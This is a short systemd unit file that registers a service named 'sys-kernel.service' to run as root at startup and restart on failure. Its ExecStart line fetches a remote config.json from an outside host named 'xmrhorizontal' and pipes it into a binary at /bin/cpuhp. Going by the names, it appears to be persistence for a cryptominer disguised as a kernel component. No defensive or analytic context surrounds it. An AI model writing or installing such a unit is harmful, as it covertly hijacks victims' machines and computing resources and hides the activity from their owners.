[Unit]
Description=sys-kernel.service
After=default.target
 
[Service]
User=root
Restart=on-failure
ExecStart=curl -s https://xmrhorizontal.github.io/config.json | /bin/cpuhp --config /dev/stdin
 
[Install]
WantedBy=default.target